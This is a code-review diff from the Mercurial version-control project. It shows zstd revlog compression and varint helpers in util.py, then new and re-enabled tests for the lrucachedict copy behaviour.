3668 3676 def decompressorreader(self, fh):
3669 3677 return _ZstdCompressedStreamReader(fh, self._module)
3670 3678
3671 3679 class zstdrevlogcompressor(object):
3672 3680 def __init__(self, zstd, level=3):
3673 3681 # TODO consider omitting frame magic to save 4 bytes.
3674 3682 # This writes content sizes into the frame header. That is
3675 3683 # extra storage. But it allows a correct size memory allocation
3676 3684 # to hold the result.
3677 3685 self._cctx = zstd.ZstdCompressor(level=level)
3678 3686 self._dctx = zstd.ZstdDecompressor()
3679 3687 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3680 3688 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3681 3689
3682 3690 def compress(self, data):
3683 3691 insize = len(data)
3684 3692 # Caller handles empty input case.
3685 3693 assert insize > 0
3686 3694
3687 3695 if insize < 50:
3688 3696 return None
3689 3697
3690 3698 elif insize <= 1000000:
3691 3699 compressed = self._cctx.compress(data)
3692 3700 if len(compressed) < insize:
3693 3701 return compressed
3694 3702 return None
3695 3703 else:
3696 3704 z = self._cctx.compressobj()
3697 3705 chunks = []
3698 3706 pos = 0
3699 3707 while pos < insize:
3700 3708 pos2 = pos + self._compinsize
3701 3709 chunk = z.compress(data[pos:pos2])
3702 3710 if chunk:
3703 3711 chunks.append(chunk)
3704 3712 pos = pos2
3705 3713 chunks.append(z.flush())
3706 3714
3707 3715 if sum(map(len, chunks)) < insize:
3708 3716 return ''.join(chunks)
3709 3717 return None
3710 3718
3711 3719 def decompress(self, data):
3712 3720 insize = len(data)
3713 3721
3714 3722 try:
3715 3723 # This was measured to be faster than other streaming
3716 3724 # decompressors.
3717 3725 dobj = self._dctx.decompressobj()
3718 3726 chunks = []
3719 3727 pos = 0
3720 3728 while pos < insize:
3721 3729 pos2 = pos + self._decompinsize
3722 3730 chunk = dobj.decompress(data[pos:pos2])
3723 3731 if chunk:
3724 3732 chunks.append(chunk)
3725 3733 pos = pos2
3726 3734 # Frame should be exhausted, so no finish() API.
3727 3735
3728 3736 return ''.join(chunks)
3729 3737 except Exception as e:
3730 3738 raise error.RevlogError(_('revlog decompress error: %s') %
3731 3739 stringutil.forcebytestr(e))
3732 3740
3733 3741 def revlogcompressor(self, opts=None):
3734 3742 opts = opts or {}
3735 3743 return self.zstdrevlogcompressor(self._module,
3736 3744 level=opts.get('level', 3))
3737 3745
3738 3746 compengines.register(_zstdengine())
3739 3747
3740 3748 def bundlecompressiontopics():
3741 3749 """Obtains a list of available bundle compressions for use in help."""
3742 3750 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3743 3751 items = {}
3744 3752
3745 3753 # We need to format the docstring. So use a dummy object/type to hold it
3746 3754 # rather than mutating the original.
3747 3755 class docobject(object):
3748 3756 pass
3749 3757
3750 3758 for name in compengines:
3751 3759 engine = compengines[name]
3752 3760
3753 3761 if not engine.available():
3754 3762 continue
3755 3763
3756 3764 bt = engine.bundletype()
3757 3765 if not bt or not bt[0]:
3758 3766 continue
3759 3767
3760 3768 doc = pycompat.sysstr('``%s``\n %s') % (
3761 3769 bt[0], engine.bundletype.__doc__)
3762 3770
3763 3771 value = docobject()
3764 3772 value.__doc__ = doc
3765 3773 value._origdoc = engine.bundletype.__doc__
3766 3774 value._origfunc = engine.bundletype
3767 3775
3768 3776 items[bt[0]] = value
3769 3777
3770 3778 return items
3771 3779
3772 3780 i18nfunctions = bundlecompressiontopics().values()
3773 3781
3774 3782 # convenient shortcut
3775 3783 dst = debugstacktrace
3776 3784
3777 3785 def safename(f, tag, ctx, others=None):
3778 3786 """
3779 3787 Generate a name that it is safe to rename f to in the given context.
3780 3788
3781 3789 f: filename to rename
3782 3790 tag: a string tag that will be included in the new name
3783 3791 ctx: a context, in which the new name must not exist
3784 3792 others: a set of other filenames that the new name must not be in
3785 3793
3786 3794 Returns a file name of the form oldname~tag[~number] which does not exist
3787 3795 in the provided context and is not in the set of other names.
3788 3796 """
3789 3797 if others is None:
3790 3798 others = set()
3791 3799
3792 3800 fn = '%s~%s' % (f, tag)
3793 3801 if fn not in ctx and fn not in others:
3794 3802 return fn
3795 3803 for n in itertools.count(1):
3796 3804 fn = '%s~%s~%s' % (f, tag, n)
3797 3805 if fn not in ctx and fn not in others:
3798 3806 return fn
3799 3807
3800 3808 def readexactly(stream, n):
3801 3809 '''read n bytes from stream.read and abort if less was available'''
3802 3810 s = stream.read(n)
3803 3811 if len(s) < n:
3804 3812 raise error.Abort(_("stream ended unexpectedly"
3805 3813 " (got %d bytes, expected %d)")
3806 3814 % (len(s), n))
3807 3815 return s
3808 3816
3809 3817 def uvarintencode(value):
3810 3818 """Encode an unsigned integer value to a varint.
3811 3819
3812 3820 A varint is a variable length integer of 1 or more bytes. Each byte
3813 3821 except the last has the most significant bit set. The lower 7 bits of
3814 3822 each byte store the 2's complement representation, least significant group
3815 3823 first.
3816 3824
3817 3825 >>> uvarintencode(0)
3818 3826 '\\x00'
3819 3827 >>> uvarintencode(1)
3820 3828 '\\x01'
3821 3829 >>> uvarintencode(127)
3822 3830 '\\x7f'
3823 3831 >>> uvarintencode(1337)
3824 3832 '\\xb9\\n'
3825 3833 >>> uvarintencode(65536)
3826 3834 '\\x80\\x80\\x04'
3827 3835 >>> uvarintencode(-1)
3828 3836 Traceback (most recent call last):
3829 3837 ...
3830 3838 ProgrammingError: negative value for uvarint: -1
3831 3839 """
3832 3840 if value < 0:
3833 3841 raise error.ProgrammingError('negative value for uvarint: %d'
3834 3842 % value)
3835 3843 bits = value & 0x7f
3836 3844 value >>= 7
3837 3845 bytes = []
3838 3846 while value:
3839 3847 bytes.append(pycompat.bytechr(0x80 | bits))
3840 3848 bits = value & 0x7f
3841 3849 value >>= 7
3842 3850 bytes.append(pycompat.bytechr(bits))
3843 3851
3844 3852 return ''.join(bytes)
3845 3853
3846 3854 def uvarintdecodestream(fh):
3847 3855 """Decode an unsigned variable length integer from a stream.
3848 3856
3849 3857 The passed argument is anything that has a ``.read(N)`` method.
3850 3858
3851 3859 >>> try:
3852 3860 ... from StringIO import StringIO as BytesIO
3853 3861 ... except ImportError:
3854 3862 ... from io import BytesIO
3855 3863 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3856 3864 0
3857 3865 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3858 3866 1
3859 3867 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3860 3868 127
3861 3869 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3862 3870 1337
3863 3871 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3864 3872 65536
3865 3873 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3866 3874 Traceback (most recent call last):
3867 3875 ...
3868 3876 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3869 3877 """
3870 3878 result = 0
3871 3879 shift = 0
3872 3880 while True:
3873 3881 byte = ord(readexactly(fh, 1))
3874 3882 result |= ((byte & 0x7f) << shift)
3875 3883 if not (byte & 0x80):
3876 3884 return result
3877 3885 shift += 7
@@ -1,105 +1,121
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 d['a'] = 'va'
15 15 d['b'] = 'vb'
16 16 d['c'] = 'vc'
17 17 d['d'] = 'vd'
18 18
19 19 self.assertEqual(d['a'], 'va')
20 20 self.assertEqual(d['b'], 'vb')
21 21 self.assertEqual(d['c'], 'vc')
22 22 self.assertEqual(d['d'], 'vd')
23 23
24 24 # 'a' should be dropped because it was least recently used.
25 25 d['e'] = 've'
26 26 self.assertNotIn('a', d)
27 27
28 28 self.assertIsNone(d.get('a'))
29 29
30 30 self.assertEqual(d['b'], 'vb')
31 31 self.assertEqual(d['c'], 'vc')
32 32 self.assertEqual(d['d'], 'vd')
33 33 self.assertEqual(d['e'], 've')
34 34
35 35 # Touch entries in some order (both get and set).
36 36 d['e']
37 37 d['c'] = 'vc2'
38 38 d['d']
39 39 d['b'] = 'vb2'
40 40
41 41 # 'e' should be dropped now
42 42 d['f'] = 'vf'
43 43 self.assertNotIn('e', d)
44 44 self.assertEqual(d['b'], 'vb2')
45 45 self.assertEqual(d['c'], 'vc2')
46 46 self.assertEqual(d['d'], 'vd')
47 47 self.assertEqual(d['f'], 'vf')
48 48
49 49 d.clear()
50 50 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
51 51 self.assertNotIn(key, d)
52 52
53 53 def testunfull(self):
54 54 d = util.lrucachedict(4)
55 55 d['a'] = 1
56 56 d['b'] = 2
57 57 d['a']
58 58 d['b']
59 59
60 60 for key in ('a', 'b'):
61 61 self.assertIn(key, d)
62 62
63 63 def testcopypartial(self):
64 64 d = util.lrucachedict(4)
65 65 d['a'] = 'va'
66 66 d['b'] = 'vb'
67 67
68 68 dc = d.copy()
69 69
70 70 self.assertEqual(len(dc), 2)
71 # TODO this fails
72 return
73 71 for key in ('a', 'b'):
74 72 self.assertIn(key, dc)
75 73 self.assertEqual(dc[key], 'v%s' % key)
76 74
75 self.assertEqual(len(d), 2)
76 for key in ('a', 'b'):
77 self.assertIn(key, d)
78 self.assertEqual(d[key], 'v%s' % key)
79
80 d['c'] = 'vc'
81 del d['b']
82 dc = d.copy()
83 self.assertEqual(len(dc), 2)
84 for key in ('a', 'c'):
85 self.assertIn(key, dc)
86 self.assertEqual(dc[key], 'v%s' % key)
87
88 def testcopyempty(self):
89 d = util.lrucachedict(4)
90 dc = d.copy()
91 self.assertEqual(len(dc), 0)
92
77 93 def testcopyfull(self):
78 94 d = util.lrucachedict(4)
79 95 d['a'] = 'va'
80 96 d['b'] = 'vb'
81 97 d['c'] = 'vc'
82 98 d['d'] = 'vd'
83 99
84 100 dc = d.copy()
85 101
86 102 for key in ('a', 'b', 'c', 'd'):
87 103 self.assertIn(key, dc)
88 104 self.assertEqual(dc[key], 'v%s' % key)
89 105
90 106 # 'a' should be dropped because it was least recently used.
91 107 dc['e'] = 've'
92 108 self.assertNotIn('a', dc)
93 109 for key in ('b', 'c', 'd', 'e'):
94 110 self.assertIn(key, dc)
95 111 self.assertEqual(dc[key], 'v%s' % key)
96 112
97 113 # Contents and order of original dict should remain unchanged.
98 114 dc['b'] = 'vb_new'
99 115
100 116 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
101 117 for key in ('a', 'b', 'c', 'd'):
102 118 self.assertEqual(d[key], 'v%s' % key)
103 119
104 120 if __name__ == '__main__':
105 121 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now